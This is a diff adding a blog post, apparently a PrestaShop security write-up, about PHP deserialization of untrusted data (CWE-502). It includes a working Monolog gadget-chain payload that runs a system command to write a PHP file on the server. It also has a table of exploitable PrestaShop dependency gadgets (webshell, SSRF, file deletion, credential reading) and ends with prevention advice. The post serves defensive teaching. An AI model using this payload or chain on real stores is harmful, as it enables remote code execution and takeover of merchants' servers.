_posts/2023-08-28-deserialization-untrusted-data-CWE-502-part1.md

```diff
@@ -0,0 +1,102 @@
+
+
+### Proof of concept
+
+In a similar way, the popular library `Monolog` can be hijacked to execute remote code. Let’s explain it on a POC.
+
+We created a simple module to demontrate the danger of a deserialization. Please note that any php script that include PrestaShop core file `config/config.inc.php` load vendors libraries and consequently `Monolog` (PS 1.7+) or others librairies.
+
+**FOR EDUCATIONAL PURPOSES ONLY. DO NOT USE THIS SCRIPT FOR ILLEGAL ACTIVITIES. THE AUTHOR IS NOT RESPONSIBLE FOR ANY MISUSE OR DAMAGE.**
+
+1. Create a little module
+
+```php
+// modules/mymodule/mymodule.php
+
+class Mymodule
+{
+...
+    public function getContent()
+    {
+        $payload = 'O:37:"Monolog\Handler\FingersCrossedHandler":3:{s:13:"passthruLevel";i:0;s:6:"buffer";a:1:{s:4:"test";a:2:{i:0;s:45:"echo \'<?php echo "♥" . (25-125);\' > ./a.php";s:5:"level";N;}}s:7:"handler";O:29:"Monolog\Handler\BufferHandler":7:{s:7:"handler";N;s:10:"bufferSize";i:-1;s:6:"buffer";N;s:5:"level";N;s:11:"initialized";b:1;s:11:"bufferLimit";i:-1;s:10:"processors";a:2:{i:0;s:7:"current";i:1;s:6:"system";}}}';
+
+        $unsafeDeserialization = unserialize($payload);
+
+        return var_dump($unsafeDeserialization, true);
+    }
+...
+```
+
+2. Go to the configuration page of the module.
+
+3. This piece of code will put an `a.php` file in the designated directory of the PrestaShop.
+
+
+### Malicious usage through PrestaShop dependancies
+
+Mailicious usage in PrestaShop via commons libraries are :
+* remote code execution (RCE) to put a webshell
+* Server Side Request Forgery (SSRF) to agress other website with a clean IP, 
+* File Deletion (FD) to remove an htaccess and expose logs or sensitive data,
+* File Writer (WF) to put a webshell
+* Files read reader (RF) to read sensitive data like mysql password,
+* SQL injections (SQLi),
+* Technical data leaks (Info).
+
+|PrestaShop dependancy|Malicious usage|
+| ------|-----|
+|Smarty|SSRF and FD|
+|Monolog|RCE and FW|
+|Symfony|FD, FW, and RCE|
+|Doctrine|RCE and FW|
+|TCPDF|FD|
+|Guzzle|FW, Info and RCE|
+
+Source: [PHP Generic Gadget Chains](https://github.com/ambionics/phpggc/tree/master/gadgetchains)
+
+NB 1: This list is not exhaustive. Modules dependancies can also include others hijackable classes.
+
+NB 2: Several PrestaShop core or modules configurations are stored in database as serialized strings. In chain, an SQL injection can also be exploited to inject malicious serialized string that will be triggered during the deserialization.
+
+
+### How to prevent this vulnerability?
+
+As you understand, `unserialize($_GET['param'])` (or `$_POST`, `$_COOKIE`, ...), each untrusted data unserialized is a critical vulnerability. 
+
+* A strict validation of input data is absolutly essential !
+* Use json serialization instead as soon as possible.
+* Disable the desarialization of classes via `unserialize($args, ['allowed_classes' => false])`. That's not perfert but better than nothing.
```

Comment:
* Disable the desarialization of classes via `unserialize($args, ['allowed_classes' => false])`. That's not perfect, but it's better than nothing.